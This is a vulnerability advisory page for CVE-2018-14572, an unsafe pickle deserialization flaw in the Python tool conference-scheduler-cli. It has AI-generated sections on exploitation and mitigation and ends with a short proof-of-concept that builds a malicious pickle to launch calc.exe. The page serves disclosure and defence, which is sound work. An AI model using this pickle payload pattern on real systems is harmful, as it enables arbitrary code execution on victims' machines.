CVE-2018-14572
Description
Conference-scheduler-cli deserializes untrusted pickle data, allowing remote code execution via a crafted .pickle file.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Conference-scheduler-cli deserializes untrusted pickle data, allowing remote code execution via a crafted .pickle file.
Vulnerability
The conference-scheduler-cli tool, a Python command-line utility for managing conference schedules, uses pickle.load() on data imported from .pickle files without any validation or sanitization [1][2]. This deserialization vulnerability exists in all versions of the tool prior to any fix. The code path is reachable when the tool processes imported schedule data, which can be supplied by an attacker as a malicious .pickle file [1].
Exploitation
An attacker needs only to provide a crafted .pickle file to the victim, either by direct file transfer, network share, or social engineering. No authentication or special privileges are required. The attacker embeds arbitrary Python code (e.g., os.system) within the pickle serialization. When the victim runs the scheduler build command or any operation that loads the imported data, the tool calls pickle.load() on the malicious file, executing the embedded code [1][2].
Impact
Successful exploitation results in arbitrary code execution with the privileges of the user running the conference-scheduler-cli tool. This can lead to full compromise of the affected system, including data exfiltration, installation of malware, or further lateral movement [1][2].
Mitigation
As of the publication date (2018-08-28), no official patch has been released for this vulnerability [2][3]. The project may be unmaintained. Users should avoid loading untrusted .pickle files and consider using safer serialization formats such as JSON or YAML. If the tool must be used, restrict file sources to trusted origins and apply strict file integrity checks [2][3].
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
conference-scheduler-cliPyPI | <= 0.10.1 | — |
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The application deserializes untrusted pickle data, allowing arbitrary code execution."
Attack vector
An attacker can craft a malicious `.pickle` file containing Python code that executes arbitrary commands, such as `os.system` or `subprocess.Popen` [ref_id=1]. This file can then be imported by the `conference-scheduler-cli` application via the `io.import_schedule_definition` function, leading to remote code execution [ref_id=1]. The vulnerability is present in versions up to and including 0.10.1 [ref_id=1].
Affected code
The vulnerability lies within the `pickle.load` call on imported data in the `conference-scheduler-cli` application. Specifically, the `io.import_schedule_definition` function is used to load data from a `.pickle` file, which is then deserialized without proper validation [ref_id=1].
What the fix does
The advisory recommends using `yaml.safe_load` to parse YAML files instead of `pickle.load` for imported data [ref_id=1]. This change would prevent the deserialization of untrusted pickle data, thereby mitigating the risk of arbitrary code execution.
Preconditions
- inputThe attacker must provide a crafted `.pickle` file.
- inputThe target system must be running a vulnerable version of `conference-scheduler-cli` (<= 0.10.1).
Reproduction
```python from scheduler import io import os from pathlib import Path import pickle
class joel_test(object): def __reduce__(self): import subprocess return (subprocess.Popen, ('calc.exe',))
test = joel_test() f=open('solution\scheduler.pickle','wb') pickle.dump(test,f) f.close() io.import_schedule_definition(Path(Path.cwd(), 'solution')) ``` [ref_id=1]
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6- github.com/advisories/GHSA-cf3c-fffp-34qhghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2018-14572ghsaADVISORY
- github.com/PyconUK/ConferenceScheduler-cli/issues/19ghsax_refsource_MISCWEB
- github.com/pypa/advisory-database/tree/main/vulns/conference-scheduler-cli/PYSEC-2018-64.yamlghsaWEB
- joel-malwarebenchmark.github.io/blog/2020/04/25/cve-2018-14572-conference-scheduler-clighsaWEB
- joel-malwarebenchmark.github.io/blog/2020/04/25/cve-2018-14572-conference-scheduler-cli/mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.